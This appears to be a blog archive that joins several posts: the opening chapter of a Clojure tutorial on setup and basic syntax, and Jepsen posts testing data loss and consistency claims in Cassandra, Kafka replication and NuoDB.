We’re going to explore the nature of syntax, metalanguages, values, references, mutation, control flow, and concurrency. Many languages leave these ideas implicit in the language construction, or don’t have a concept of metalanguages or concurrency at all. Clojure makes these ideas explicit, first-class language constructs.

At the same time, we’re going to defer or omit any serious discussion of static type analysis, hardware, and performance. This is not to say that these ideas aren’t important; just that they don’t fit well within this particular narrative arc. For a deep exploration of type theory I recommend a study in Haskell, and for a better understanding of underlying hardware, learning C and an assembly language will undoubtedly help.

In more general terms, Clojure is a well-rounded language. It offers broad library support and runs on multiple operating systems. Clojure performance is not terrific, but is orders of magnitude faster than Ruby, Python, or Javascript. Unlike some faster languages, Clojure emphasizes safety in its type system and approach to parallelism, making it easier to write correct multithreaded programs. Clojure is concise, requiring very little code to express complex operations. It offers a REPL and dynamic type system: ideal for beginners to experiment with, and well-suited for manipulating complex data structures. A consistently designed standard library and full-featured set of core datatypes rounds out the Clojure toolbox.

Finally, there are some drawbacks. As a compiled language, Clojure is much slower to start than a scripting language; this makes it unsuitable for writing small scripts for interactive use. Clojure is also not well-suited for high-performance numeric operations. Though it is possible, you have to jump through hoops to achieve performance comparable with Java. I’ll do my best to call out these constraints and shortcomings as we proceed through the text.

With that context out of the way, let’s get started by installing Clojure!

Getting set up

First, you’ll need a Java Virtual Machine, or JVM, and its associated development tools, called the JDK. This is the software which runs a Clojure program. If you’re on Windows, install Oracle JDK 1.7. If you’re on OS X or Linux, you may already have a JDK installed. In a terminal, try:

which javac

If you see something like

/usr/bin/javac

Then you’re good to go. If you don’t see any output from that command, install the appropriate Oracle JDK 1.7 for your operating system, or whatever JDK your package manager has available.

When you have a JDK, you’ll need Leiningen, the Clojure build tool. If you’re on a Linux or OS X computer, the instructions below should get you going right away. If you’re on Windows, see the Leiningen page for an installer. If you get stuck, you might want to start with a primer on command line basics.

mkdir -p ~/bin cd ~/bin curl -O https://raw.githubusercontent.com/technomancy/leiningen/stable/bin/lein chmod a+x lein

Leiningen automatically handles installing Clojure, finding libraries from the internet, and building and running your programs. We’ll create a new Leiningen project to play around in:

cd lein new scratch

This creates a new directory in your homedir, called scratch. If you see command not found instead, it means the directory ~/bin isn’t registered with your terminal as a place to search for programs. To fix this, add the line

export PATH="$PATH":~/bin

to the file .bash_profile in your home directory, then run source ~/.bash_profile. Re-running lein new scratch should work.

Let’s enter that directory, and start using Clojure itself:

cd scratch lein repl

The structure of programs

When you type lein repl at the terminal, you’ll see something like this:

aphyr@waterhouse:~/scratch$ lein repl nREPL server started on port 45413 REPL-y 0.2.0 Clojure 1.5.1 Docs: (doc function-name-here) (find-doc "part-of-name-here") Source: (source function-name-here) Javadoc: (javadoc java-object-or-class-here) Exit: Control+D or (exit) or (quit) user=>

This is an interactive Clojure environment called a REPL, for “Read, Evaluate, Print Loop”. It’s going to read a program we enter, run that program, and print the results. REPLs give you quick feedback, so they’re a great way to explore a program interactively, run tests, and prototype new ideas.

Let’s write a simple program. The simplest, in fact. Type “nil”, and hit enter.

user=> nil nil

nil is the most basic value in Clojure. It represents emptiness, nothing-doing, not-a-thing. The absence of information.

user=> true true user=> false false

true and false are a pair of special values called Booleans. They mean exactly what you think: whether a statement is true or false. true, false, and nil form the three poles of the Lisp logical system.

user=> 0 0

This is the number zero. Its numeric friends are 1, -47, 1.2e-4, 1/3, and so on. We might also talk about strings, which are chunks of text surrounded by double quotes:

user=> "hi there!" "hi there!"

nil, true, 0, and "hi there!" are all different types of values; the nouns of programming. Just as one could say “House.” in English, we can write a program like "hello, world" and it evaluates to itself: the string "hello world". But most sentences aren’t just about stating the existence of a thing; they involve action. We need verbs.

user=> inc #<core$inc clojure.core$inc@6f7ef41c>

This is a verb called inc–short for “increment”. Specifically, inc is a symbol which points to a verb: #<core$inc clojure.core$inc@6f7ef41c>– just like the word “run” is a name for the concept of running.

There’s a key distinction here–that a signifier, a reference, a label, is not the same as the signified, the referent, the concept itself. If you write the word “run” on paper, the ink means nothing by itself. It’s just a symbol. But in the mind of a reader, that symbol takes on meaning; the idea of running.

Unlike the number 0, or the string “hi”, symbols are references to other values. when Clojure evaluates a symbol, it looks up that symbol’s meaning. Look up inc, and you get #<core$inc clojure.core$inc@6f7ef41c>.

Can we refer to the symbol itself, without looking up its meaning?

user=> 'inc inc

Yes. The single quote ' escapes a sentence. In programming languages, we call sentences expressions or statements. A quote says “Rather than evaluating this expression’s text, simply return the text itself, unchanged.” Quote a symbol, get a symbol. Quote a number, get a number. Quote anything, and get it back exactly as it came in.

user=> '123 123 user=> '"foo" "foo" user=> '(1 2 3) (1 2 3)

A new kind of value, surrounded by parentheses: the list. LISP originally stood for LISt Processing, and lists are still at the core of the language. In fact, they form the most basic way to compose expressions, or sentences. A list is a single expression which has multiple parts. For instance, this list contains three elements: the numbers 1, 2, and 3. Lists can contain anything: numbers, strings, even other lists:

user=> '(nil "hi") (nil "hi")

A list containing two elements: the number 1, and a second list. That list contains two elements: the number 2, and another list. That list contains two elements: 3, and an empty list.

user=> '(1 (2 (3 ()))) (1 (2 (3 ())))

You could think of this structure as a tree–which is a provocative idea, because languages are like trees too: sentences are comprised of clauses, which can be nested, and each clause may have subjects modified by adjectives, and verbs modified by adverbs, and so on. “Lindsay, my best friend, took the dog which we found together at the pound on fourth street, for a walk with her mother Michelle.”

Took Lindsay my best friend the dog which we found together at the pound on fourth street for a walk with her mother Michelle

But let’s try something simpler. Something we know how to talk about. “Increment the number zero.” As a tree:

Increment the number zero

We have a symbol for incrementing, and we know how to write the number zero. Let’s combine them in a list:

clj=> '(inc 0) (inc 0)

A basic sentence. Remember, since it’s quoted, we’re talking about the tree, the text, the expression, by itself. Absent interpretation. If we remove the single-quote, Clojure will interpret the expression:

user=> (inc 0) 1

Incrementing zero yields one. And if we wanted to increment that value?

Increment increment the number zerouser=> (inc (inc 0)) 2

A sentence in Lisp is a list. It starts with a verb, and is followed by zero or more objects for that verb to act on. Each part of the list can itself be another list, in which case that nested list is evaluated first, just like a nested clause in a sentence. When we type

(inc (inc 0))

Clojure first looks up the meanings for the symbols in the code:

(#<core$inc clojure.core$inc@6f7ef41c> (#<core$inc clojure.core$inc@6f7ef41c> 0))

Then evaluates the innermost list (inc 0), which becomes the number 1:

(#<core$inc clojure.core$inc@6f7ef41c> 1)

Finally, it evaluates the outer list, incrementing the number 1:

2

Every list starts with a verb. Parts of a list are evaluated from left to right. Innermost lists are evaluated before outer lists.

(+ 1 (- 5 2) (+ 3 4)) (+ 1 3 (+ 3 4)) (+ 1 3 7) 11

That’s it.

The entire grammar of Lisp: the structure for every expression in the language. We transform expressions by substituting meanings for symbols, and obtain some result. This is the core of the Lambda Calculus, and it is the theoretical basis for almost all computer languages. Ruby, Javascript, C, Haskell; all languages express the text of their programs in different ways, but internally all construct a tree of expressions. Lisp simply makes it explicit.

Review

We started by learning a few basic nouns: numbers like 5, strings like "cat", and symbols like inc and +. We saw how quoting makes the difference between an expression itself and the thing it evaluates to. We discovered symbols as names for other values, just like how words represent concepts in any other language. Finally, we combined lists to make trees, and used those trees to represent a program.

With these basic elements of syntax in place, it’s time to expand our vocabulary with new verbs and nouns; learning to represent more complex values and transform them in different ways.

Previously on Jepsen, we learned about Kafka’s proposed replication design.

Cassandra is a Dynamo system; like Riak, it divides a hash ring into a several chunks, and keeps N replicas of each chunk on different nodes. It uses tunable quorums, hinted handoff, and active anti-entropy to keep replicas up to date. Unlike the Dynamo paper and some of its peers, Cassandra eschews vector clocks in favor of a pure last-write-wins approach.

Some Write Loses

If you read the Riak article, you might be freaking out at this point. In Riak, last-write-wins resulted in dropping 30-70% of writes, even with the strongest consistency settings (R=W=PR=PW=ALL), even with a perfect lock service ensuring writes did not occur simultaneously. To understand why, I’d like to briefly review the problem with last-write-wins in asynchronous networks.

cassandra-lww-diagram.jpg

In this causality diagram, two clients (far left and far right) add the elements “a”, “b”, and “c” to a set stored in an LWW register (middle line). The left client adds a, which is read by both clients. One client adds b, constructing the set [a b]. The other adds c, constructing the set [a c]. Both write their values back. Because the register is last-write-wins, it preserves whichever arrives with the highest timestamp. In this case, it’s as if the write from the client on the left never even happened. However, it could just as easily have discarded the write from the right-hand client. Without a strong external coordinator, there’s just no way to tell whose data will be preserved, and whose will be thrown away.

Again: in an LWW register, the only conditions under which you can guarantee your write will not be silently ignored are when the register’s value is immutable. If you never change the value, it doesn’t matter which copy you preserve.

Vector clocks avoid this problem by identifying conflicting writes, and allowing you to merge them together.

cassandra-vclock-merge.jpg

Because there’s no well-defined order for potential conflicts, the merge function needs to be associative, commutative, and idempotent. If it satisfies those three properties (in essence, if you can merge any values in any order and get the same result), the system forms a semilattice known as a CRDT, and you recover a type of order-free consistency known as lattice consistency. Last-write-wins is a particular type of CRDT–albeit, not a particularly good one, because it destroys information nondeterministically.

Early in Cassandra’s history, Cassandra chose not to implement vector clocks for performance reasons. Vclocks (typically) require a read before each write. By using last-write-wins in all cases, and ignoring the causality graph, Cassandra can cut the number of round trips required for a write from 2 to 1, and obtain a significant speedup. The downside is that there is no safe way to modify a Cassandra cell.

Some people claim you can serialize updates to a cell by perfectly synchronizing your clocks, using ConsistencyLevel.QUORUM or ALL, and using an external lock service to prevent simultaneous operations. Heck, the official Cassandra documentation even claims this:

cassandra-cap.png

cassandra-consistency.png

As we’ll see throughout this post, the Cassandra documentation can be less than accurate. Here’s a Jepsen test which mutates the same cell repeatedly, using perfectly synchronized clocks, QUORUM consistency, and a perfect lock service:

$ lein run lock cassandra ... Writes completed in 200.036 seconds 2000 total 1009 acknowledged 724 survivors 285 acknowledged writes lost! (╯°□°)╯︵ ┻━┻ 1 3 6 8 11 13 ... 1986 1988 1991 1993 1996 1998 0.5045 ack rate 0.2824579 loss rate 0.0 unacknowledged but successful rate

Losing 28% of your supposedly committed data is not serializable by any definition. Next question.

CQL and CRDTs

Without vector clocks, Cassandra can’t safely change a cell–but writing immutable data is safe. Consequently, Cassandra has evolved around those constraints, allowing you to efficiently journal thousands of cells to a single row, and to retrieve them in sorted order. Instead of modifying a cell, you write each distinct change to its own UUID-keyed cell. Then, at read time, you read all the cells back and apply a merge function to obtain a result.

cassandra-immutable-oplog-2.jpg
cassandra-merge.jpg

Cassandra’s query language, CQL, provides some collection-oriented data structures around this model: sets, lists, maps, and so forth. They’re CRDTs, though the semantics don’t align with what you’ll find in the INRIA paper–no G-sets, 2P-sets, OR-sets, etc. However, some operations are safe–for instance, adding elements to a CQL set:

0 unrecoverable timeouts Collecting results. Writes completed in 200.036 seconds 2000 total 2000 acknowledged 2000 survivors All 2000 writes succeeded. :-D

That’s terrific! This is the same behavior we saw with G-sets in Riak. However, not all CQL collection operations are intuitively correct. In particular, I’d be wary of the index-based operations for lists, updating elements in a map, and any type of deletions. Deletes are implemented by writing special tombstone cells, which declare a range of other cells to be ignored. Because Cassandra doesn’t use techniques like OR-sets, you can potentially delete records that haven’t been seen yet–even delete writes from the future. Cassandra users jokingly refer to this behavior as “doomstones”.

The important thing to remember is that because there are no ordering constraints on writes, one’s merge function must still be associative and commutative. Just as we saw with Riak, AP systems require you to reason about order-free data structures. In fact, Cassandra and Riak are (almost) formally equivalent in their consistency semantics–the primary differences are in the granularity of updates, in garbage collection/history compaction, and in performance.

Bottom line: CQL collections are a great idea, and you should use them! Read the specs carefully to figure out whether CQL operations meet your needs, and if they don’t, you can always write your own CRDTs on top of wide rows yourself.

Counters

If you’re familiar with CRDTs, you might be wondering whether Cassandra’s counter type is a PN-counter–a commutative, monotonic data structure which can be incremented and decremented in an eventually consistent way. The answer is no: Cassandra (via Twitter, politics, etc), wound up with a less safe type of data structure. Consequently, Cassandra counters will over- or under-count by a wide range during a network partition.

If partitioned for about half of the test run, I found counters could drift by up to 50% of the expected value. Here’s a relatively well-behaved run, drifting by less than a percent.

10000 total 9700 acknowledged 9921 survivors

Isolation

In Coming up in Cassandra 1.1: Row Level Isolation, and Atomic batches in Cassandra 1.2, DataStax asserts that a write which updates multiple keys in the same row will be atomic and isolated.

Cassandra 1.1 guarantees that if you update both the login and the password in the same update (for the same row key) then no concurrent read may see only a partial update.

And from the official documentation on concurrency control:

Full row-level isolation is now in place so that writes to a row are isolated to the client performing the write and are not visible to any other user until they are complete. From a transactional ACID (atomic, consistent, isolated, durable) standpoint, this enhancement now gives Cassandra transactional AID support.

We know what “atomic” means: either all of the changes in the transaction complete, or none of them do. But what does “isolated” mean? Isolated in the sense of ACID? Let’s ask Hacker News what they think Cassandra’s isolation provides:

isolation4.png isolation5.png isolation2.png isolation1.png isolation3.png

Peter Bailis pointed me at two really excellent papers on isolation and consistency, including Berenson et al’s “A Critique of ANSI SQL Isolation Levels”–I really recommend digging into them if you’re curious about this problem. Isolation comes in many flavors, or strengths, depending on what sorts of causal histories are allowed. Serializability is one of the strongest: all transactions appear to occur in a single well-defined non-interleaved order. Cursor Stability (CS) and Snapshot Isolation (SI) are somewhat weaker.

ANSI SQL defines four levels of isolation, which really have more to do with the historical behavior of various database systems than with behavior that any sane person would consider distinguishible, so I’m not going to get into the details–but suffice it to say that there are a range of phenomena which are prohibited by those isolation levels. In order from least to most awful:

  • P4: Lost Update
  • P3: Phantom
  • P2: Fuzzy read
  • P1: Dirty read
  • P0: Dirty write

ANSI SQL’s SERIALIZABLE level prohibits P3-P0; REPEATABLE READ prohibits P2 and below, READ COMMITTED prohibits P1 and below, and READ UNCOMMITTED only prohibits P0.

p0-example.jpg
cassandra-comparison-diagram.jpg

P0, or “dirty write” is especially important because all isolation levels must prohibit it. In P0, one transaction modifies some data; then a second transaction also modifies that data, before the first transaction commits. We never want writes from two different transactions to be mixed together, because it might violate integrity relationships which each transaction held independently. For instance, we might write [x=1, y=1] in one transaction, and [x=2, y=2] in a different transaction, assuming that x will always be equal to y. P0 allows those transactions to result in [x=1, y=2], or [x=2, y=1].

Cassandra allows P0.

The key thing to remember here is that in Cassandara, the order of writes is completely irrelevant. Any write made to the cluster could eventually wind up winning, if it has a higher timestamp. But–what happens if Cassandra sees two copies of a cell with the same timestamp?

It picks the lexicographically bigger value.

That means that if the values written to two distinct cells don’t have the same sort order (which is likely), Cassandra could pick final cell values from different transactions. For instance, we might write [1 -1] and [2 -2]. 2 is greater than 1, so the first cell will be 2. But -1 is bigger than -2, so -1 wins in the second cell. The result? [2 -1].

“But,” you might protest, “In order for that to happen, you’d need two timestamps to collide. It’s really unlikely that two writes will get the same microsecond-resolution timestamp, right? I’ve never seen it happen in my cluster.”

Well, it depends. If we assume N writes per second by Poisson processes to the same row, the probability of any given read seeing a conflicting value grows as the writes come closer together.

cassandra-ts-conflict-visible-chart.jpg
rate    probability of conflict/read
------------------------------------
1       1.31E-7
10      5.74E-6
100     5.30E-5
1000    5.09E-4
10000   0.00504
100000  0.0492
1000000 0.417

So if you do 100,000 writes/sec, on any given read you’ve got a 5% chance of seeing corrupt data. If you do 10 writes/sec and 1 read/sec, in each day you’ve got about a 1/3 chance of seeing corrupt data in any given day.

What if you write many rows over time–maybe 2 writes to each row, separated by a mean delta of 100 milliseconds? Then the theoretical probability of any given row being corrupt is about 5 × 10-6. That’s a pretty small probability–and remember, most applications can tolerate some small degree of corrupt data. Let’s confirm it with an experiment:

10000 total 9899 acknowledged 9942 survivors 58 acknowledged writes lost! (╯°□°)╯︵ ┻━┻ 127 253 277 339 423 434 ... 8112 8297 8650 8973 9096 9504 101 unacknowledged writes found! ヽ(´ー`)ノ 1059 1102 1139 1142 1143 1158 ... 2701 2720 2721 2800 2815 2860 0.9899 ack rate 0.0058591776 loss rate 0.01020305 unacknowledged but successful rate

Note that “writes lost” here means corrupted rows: entirely missing rows are treated as successes. Roughly 1 in 200 rows were corrupt! That’s way worse than 10-6! What gives?

It turns out that somewhere in this maze of software, either Cassandra, the DataStax Java driver, or Cassaforte is taking the current time in milliseconds and tacking on three zeroes to the end, calling it good. The probability of millisecond conflicts is significantly higher than microsecond conflicts, which is why we saw so much corrupt data.

Long story short, Cassandra row isolation is probabilistic at best; and remember, the only reason you actually want isolation is because you plan on doing two operations at the same time. If you rely on isolation, in any sense of the word, in Cassandra, you need to consider your tolerance for data corruption, and verify that you’re actually generating timestamps with the expected distribution. A strong external coordinator which guarantees unique timestamps might be of use.

Lightweight Transactions

In Cassandra 2.0.0, Lightweight Transactions offer linearizable consistency for compare-and-set operations. The implementation is based on naive Paxos–requiring four round trips for each write–but the performance can be improved with time. The important thing is that Cassandra is first to have a distributed linearizable data store, or something.

That said, sometimes you really do need linearizable operations. That’s why we added lightweight transactions in Cassandra 2.0 This is a sign of Cassandra maturing — Cassandra 1.0 (released October 2011) was the fulfilment of its designers original vision; Cassandra 2.0 takes it in new directions to make it even more powerful.

Open source has had the reputation of producing good imitations, but not innovation. Perhaps Cassandra’s origins as a hybrid of Dynamo and Bigtable did not disprove this, but Apache Cassandra’s development of lightweight transactions and CQL are true industry firsts.

The first thing you’ll notice if you try to test the new transaction system is that the Java driver doesn’t support it. It’ll throw some weird exceptions like “unknown consistency level SERIAL”, because it doesn’t support the v2 native Cassandra protocol yet. So you’ll need to use the Python Thrift client, or, in my case, get a patched client from DataStax.

The second thing you’ll notice is deadlocks. In my Jepsen tests, the cluster would go unresponsive after the first 10 or so transactions–and it would never recover. Any further attempts to modify a cell via transaction would spin endlessly in failed transactions, until I manually truncated the system.paxos table.

You can’t make this shit up.

So you confer with DataStax for a while, and they manage to reproduce and fix the bug: #6029 (Lightweight transactions race render primary key useless), and #5985 (Paxos replay of in progress update is incorrect). You start building patched versions of Cassandra.

git checkout paxos-fixed-hopefully

Let’s give it a whirl. In this transaction test, we perform repeated compare-and-set operations against a single cell, retrying failed attempts for up to 10 seconds. The first thing you’ll notice is that those four round-trips aren’t exactly lightweight, which means that at 50 transactions/sec, the majority of transaction attempts time out:

cassandra-txn-latency.png

But we’re less concerned with performance or availability than safety. Let’s slow down the test to 5 transactions/sec to reduce contention, and check: are lightweight transactions actually linearizable?

2000 total 829 acknowledged 827 survivors 3 acknowledged writes lost! (╯°□°)╯︵ ┻━┻ (102 1628 1988) 1 unacknowledged writes found! ヽ(´ー`)ノ (283) 0.4145 ack rate 0.0036188178 loss rate 0.0012062726 unacknowledged but successful rate

No. Cassandra lightweight transactions are not even close to correct. Depending on throughput, they may drop anywhere from 1-5% of acknowledged writes–and this doesn’t even require a network partition to demonstrate. It’s just a broken implementation of Paxos. In addition to the deadlock bug, these Jepsen tests revealed #6012 (Cassandra may accept multiple proposals for a single Paxos round) and #6013 (unnecessarily high false negative probabilities).

Paxos is notoriously difficult to implement correctly. The Chubby authors note:

Our tests start in safety mode and inject random failures into the system. After running for a predetermined period of time, we stop injecting failures and give the system time to fully recover. Then we switch the test to liveness mode. The purpose for the liveness test is to verify that the system does not deadlock after a sequence of failures.

This test proved useful in finding various subtle protocol errors, including errors in our group membership implementation, and our modifications to deal with corrupted disks…. We found additional bugs, some of which took weeks of simulated execution time (at extremely high failure rates) to find.

Our hooks can be used to crash a replica, disconnect it from other replicas for a period of time or force a replica to pretend that it is no longer the master. This test found five subtle bugs in Chubby related to master failover in its first two weeks.

And in particular, I want to emphasize:

By their very nature, fault-tolerant systems try to mask problems. Thus they can mask bugs or configuration problems while insidiously lowering their own fault-tolerance.

The bugs I found were low-hanging fruit: anyone who ran a few hundred simple transactions could reproduce them, even without causing a single node or network failure. Why didn’t DataStax catch this in the release process? Why publish glowing blog posts and smug retrospectives if the most fundamental safety properties of the application haven’t been trivially verified? And if I hadn’t reported these bugs, how many users do you suppose would have been subject to silent data loss or corruption in prod?

I can’t say this strongly enough: One way or another, software is always tested: either by the maintainers, by users, or by applications in production. One of my goals in this series is to push database vendors to test their software prior to release, so that we can all enjoy safer, faster systems. If you’re writing a database, please try to verify its correctness experimentally. You don’t need to do a perfect job–testing is tough!–but a little effort can catch 90% of the bugs.

Final thoughts

DataStax and the open-source community around Cassandra have been working hard on the AP storage problem for several years, and it shows. Cassandra runs on thousand-node clusters and accepts phenomenal write volume. It’s extraordinarily suited for high-throughput capture of immutable or otherwise log-oriented data, and its AAE and tunable durability features work well. It is, in short, a capable AP datastore, and though I haven’t deployed it personally, many engineers I respect recommend it from their production experience wholeheartedly.

Jonathan Ellis, Aleksey Yeschenko‎, and Patrick McFadin were all very helpful in helping me understand Cassandra’s model, and I hope that I have depicted it accurately here. Any errors are mine alone. I’m especially thankful that they volunteered so much of their time on nights and weekends to help someone tear apart their hard work, and that they’ve fixed the bugs I’ve found so quickly. Reproducing and fixing distributed systems bugs is an especially challenging task, and it speaks to the skill of the entire Cassandra team.

DataStax has adapted some of these Jepsen tests for use in their internal testing process, and, like Basho, may use Jepsen directly to help test future releases. I’m optimistic that they’ll notify users that the transactional features are unsafe in the current release, and clarify their documentation and marketing. Again, there’s nothing technically wrong with many of the behaviors I’ve discussed above–they’re simply subtle, and deserve clear exposition so that users can interpret them correctly.

I’m looking forward to watching a good database improve.

In the last Jepsen post, we learned about NuoDB. Now it’s time to switch gears and discuss Kafka. Up next: Cassandra.

Kafka is a messaging system which provides an immutable, linearizable, sharded log of messages. Throughput and storage capacity scale linearly with nodes, and thanks to some impressive engineering tricks, Kafka can push astonishingly high volume through each node; often saturating disk, network, or both. Consumers use Zookeeper to coordinate their reads over the message log, providing efficient at-least-once delivery–and some other nice properties, like replayability.

kafka-ca.png

In the upcoming 0.8 release, Kafka is introducing a new feature: replication. Replication enhances the durability and availability of Kafka by duplicating each shard’s data across multiple nodes. In this post, we’ll explore how Kafka’s proposed replication system works, and see a new type of failure.

Here’s a slide from Jun Rao’s overview of the replication architecture. In the context of the CAP theorem, Kafka claims to provide both serializability and availability by sacrificing partition tolerance. Kafka can do this because LinkedIn’s brokers run in a datacenter, where partitions are rare.

Note that the claimed behavior isn’t impossible: Kafka could be a CP system, providing “bytewise identical replicas” and remaining available whenever, say, a majority of nodes are connected. It just can’t be fully available if a partition occurs. On the other hand, we saw that NuoDB, in purporting to refute the CAP theorem, actually sacrificed availability. What happens to Kafka during a network partition?

Design

kafka-isr.jpg
kafka-isr-1.jpg
kafka-tolerance-leader-isolated.jpg
kafka-tolerance-leader-disappears.jpg
kafka-promotion.jpg
kafka-loss.jpg

Kafka’s replication design uses leaders, elected via Zookeeper. Each shard has a single leader. The leader maintains a set of in-sync-replicas: all the nodes which are up-to-date with the leader’s log, and actively acknowledging new writes. Every write goes through the leader and is propagated to every node in the In Sync Replica set, or ISR. Once all nodes in the ISR have acknowledged the request, the leader considers it committed, and can ack to the client.

When a node fails, the leader detects that writes have timed out, and removes that node from the ISR in Zookeeper. Remaining writes only have to be acknowledged by the healthy nodes still in the ISR, so we can tolerate a few failing or inaccessible nodes safely.

So far, so good; this is about what you’d expect from a synchronous replication design. But then there’s this claim from the replication blog posts and wiki: “with f nodes, Kafka can tolerate f-1 failures”.

This is of note because most CP systems only claim tolerance to n/2-1 failures; e.g. a majority of nodes must be connected and healthy in order to continue. Linkedin says that majority quorums are not reliable enough, in their operational experience, and that tolerating the loss of all but one node is an important aspect of the design.

Kafka attains this goal by allowing the ISR to shrink to just one node: the leader itself. In this state, the leader is acknowledging writes which have been only been persisted locally. What happens if the leader then loses its Zookeeper claim?

The system cannot safely continue–but the show must go on. In this case, Kafka holds a new election and promotes any remaining node–which could be arbitrarily far behind the original leader. That node begins accepting requests and replicating them to the new ISR.

When the original leader comes back online, we have a conflict. The old leader is identical with the new up until some point, after which they diverge. Two possibilities come to mind: we could preserve both writes, perhaps appending the old leader’s writes to the new–but this would violate the linear ordering property Kafka aims to preserve. Another option is to drop the old leader’s conflicting writes altogether. This means destroying committed data.

In order to see this failure mode, two things have to happen:

  1. The ISR must shrink such that some node (the new leader) is no longer in the ISR.
  2. All nodes in the ISR must lose their Zookeeper connection.

For instance, a lossy NIC which drops some packets but not others might isolate a leader from its Kafka followers, but break the Zookeeper connection slightly later. Or the leader could be partitioned from the other kafka nodes by a network failure, and then crash, lose power, or be restarted by an administrator. Or there could be correlated failures across multiple nodes, though this is less likely.

In short, two well-timed failures (or, depending on how you look at it, one complex failure) on a single node can cause the loss of arbitrary writes in the proposed replication system.

kafka-diagram.jpg

I want to rephrase this, because it’s a bit tricky to understand. In the causality diagram to the right, the three vertical lines represent three distinct nodes, and time flows downwards. Initially, the Leader (L) can replicate requests to its followers in the ISR. Then a partition occurs, and writes time out. The leader detects the failure and removes nodes 2 and 3 from the ISR, then acknowledges some log entries written only to itself.

When the leader loses its Zookeeper connection, the middle node becomes the new leader. What data does it have? We can trace its line upwards in time to see that it only knows about the very first write made. All other writes on the original leader are causally disconnected from the new leader. This is the reason data is lost: the causal invariant between leaders is violated by electing a new node once the ISR is empty.

I suspected this problem existed from reading the JIRA ticket, but after talking it through with Jay Kreps I wasn’t convinced I understood the system correctly. Time for an experiment!

Results

First, I should mention that Kafka has some parameters that control write consistency. The default behaves like MongoDB: writes are not replicated prior to acknowledgement, which allows for higher throughput at the cost of safety. In this test, we’ll be running in synchronous mode:

(producer/producer {"metadata.broker.list" (str (:host opts) ":9092") "request.required.acks" "-1" ; all in-sync brokers "producer.type" "sync" "message.send.max_retries" "1" "connect.timeout.ms" "1000" "retry.backoff.ms" "1000" "serializer.class" "kafka.serializer.DefaultEncoder" "partitioner.class" "kafka.producer.DefaultPartitioner"})

With that out of the way, our writes should be fully acknowledged by the ISR once the client returns from a write operation successfully. We’ll enqueue a series of integers into the Kafka cluster, then isolate a leader using iptables from the other Kafka nodes. Latencies spike initially, while the leader waits for the missing nodes to respond.

A few requests may fail, but the ISR shrinks in a few seconds and writes begin to succeed again.

kafka-part.png

We’ll allow that leader to acknowledge writes independently, for a time. While these writes look fine, they’re actually only durable on a single node–and could be lost if a leader election occurs.

kafka-zombie.png

Then we totally partition the leader. ZK detects the leader’s disconnection and the remaining nodes will promote a new leader, causing data loss. Again, a brief latency spike:

kafka-recovery.png

At the end of the run, Kafka typically acknowledges 98–100% of writes. However, half of those writes (all those made during the partition) are lost.

Writes completed in 100.023 seconds 1000 total 987 acknowledged 468 survivors 520 acknowledged writes lost! (╯°□°)╯︵ ┻━┻ 130 131 132 133 134 135 ... 644 645 646 647 648 649 1 unacknowledged writes found! ヽ(´ー`)ノ (126) 0.987 ack rate 0.52684903 loss rate 0.0010131713 unacknowledged but successful rate

Discussion

Kafka’s replication claimed to be CA, but in the presence of a partition, threw away an arbitrarily large volume of committed writes. It claimed tolerance to F-1 failures, but a single node could cause catastrophe. How could we improve the algorithm?

All redundant systems have a breaking point. If you lose all N nodes in a system which writes to N nodes synchronously, it’ll lose data. If you lose 1 node in a system which writes to 1 node synchronously, that’ll lose data too. There’s a tradeoff to be made between how many nodes are required for a write, and the number of faults which cause data loss. That’s why many systems offer per-request settings for durability. But what choice is optimal, in general? If we wanted to preserve the all-nodes-in-the-ISR model, could we constrain the ISR in a way which is most highly available?

It turns out there is a maximally available number. From Peleg and Wool’s overview paper on quorum consensus:

It is shown that in a complete network the optimal availability quorum system is the majority (Maj) coterie if p < ½.

In particular, given uniformly distributed element failure probabilities smaller than ½ (which realistically describes most homogenous clusters), the worst quorum systems are the Single coterie (one failure causes unavailability), and the best quorum system is the simple Majority (provided the cohort size is small). Because Kafka keeps only a small number (on the order of 1-10) replicas, Majority quorums are provably optimal in their availability characteristics.

You can reason about this from extreme cases: if we allow the ISR to shrink to 1 node, the probability of a single additional failure causing data loss is high. If we require the ISR include all nodes, any node failure will make the system unavailable for writes. If we assume failures are partially independent, the probability of two failures goes like 1 - (1-p)2, which is much smaller than p. This superlinear failure probability at both ends is why bounding the ISR size in the middle has the lowest probability of failure.

I made two recommendations to the Kafka team:

  1. Ensure that the ISR never goes below N/2 nodes. This reduces the probability of a single node failure causing the loss of commited writes.

  2. In the event that the ISR becomes empty, block and sound an alarm instead of silently dropping data. It’s OK to make this configurable, but as an administrator, you probably want to be aware when a datastore is about to violate one of its constraints–and make the decision yourself. It might be better to wait until an old leader can be recovered. Or perhaps the administrator would like a dump of the to-be-dropped writes which could be merged back into the new state of the cluster.

Finally, remember that this is pre-release software; we’re discussing a candidate design, not a finished product. Jay Kreps and I discussed the possibility of a “stronger safety” mode which does bound the ISR and halts when it becomes empty–if that mode makes it into the next release, and strong safety is important for your use case, check that it is enabled.

Remember, Jun Rao, Jay Kreps, Neha Narkhede, and the rest of the Kafka team are seasoned distributed systems experts–they’re much better at this sort of thing than I am. They’re also contending with nontrivial performance and fault-tolerance constraints at LinkedIn–and those constraints shape the design space of Kafka in ways I can’t fully understand. I trust that they’ve thought about this problem extensively, and will make the right tradeoffs for their (and hopefully everyone’s) use case. Kafka is still a phenomenal persistent messaging system, and I expect it will only get better.

The next post in the Jepsen series explores Cassandra, an AP datastore based on the Dynamo model.

Previously on Jepsen, we explored Zookeeper. Next up: Kafka.

NuoDB came to my attention through an amazing mailing list thread by the famous database engineer Jim Starkey, in which he argues that he has disproved the CAP theorem:

The CAP conjecture, I am convinced, is false and can be proven false.

The CAP conjecture has been a theoretical millstone around the neck of all ACID systems. Good riddance.

This is the first wooden stake for the heart of the noSQL movement. There are more coming.

I, and every database user on the planet, not to mention a good part of the distributed systems research community, would love to find a counterexample which disproves the CAP theorem. For that matter, I’m tremendously excited about the possibilities of causal and lattice consistency, which we know are achievable in asynchronous networks. So I was curious: what was NimbusDB (now named NuoDB) up to? How does their consistency model work?

I usually try to understand a new system by reading the documentation, scanning for words like “safety”, “order”, “serializability”, “linearizability”, “consistency”, “conflict”, and “replica”. I keep notes as I go. Here are a few excerpts from my first six hours trying to figure out NuoDB’s consistency invariants:

nuodb.png

In particular, I want to draw attention to this excerpt:

If the CAP theorem means that all surviving nodes must be able to continue processing without communication after a network failure, than NUODB is not partition resistant.

This is kind of an odd statement to make, because Gilbert and Lynch’s proof defines “availability” as “every request received by a non-failing node in the system must result in a response.” That would seem to imply that NuoDB does not satisfy CAP availability.

